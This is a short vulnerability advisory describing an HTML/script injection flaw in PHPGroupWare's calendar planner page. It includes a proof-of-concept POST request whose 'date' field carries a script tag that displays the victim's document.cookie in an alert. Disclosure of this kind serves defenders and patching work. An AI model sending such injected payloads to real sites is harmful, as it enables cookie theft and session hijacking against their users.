PHPGroupWare Index.PHP HTML Injection Vulnerability

PHPGroupWare Index.PHP HTML Injection Vulnerability

No exploit is required, the following example is available.

http://[target]/[phpgroupware_directory]/index.php?menuaction=calendar.uicalendar.planner
POST DATA: date="><script>alert(document.cookie)</script>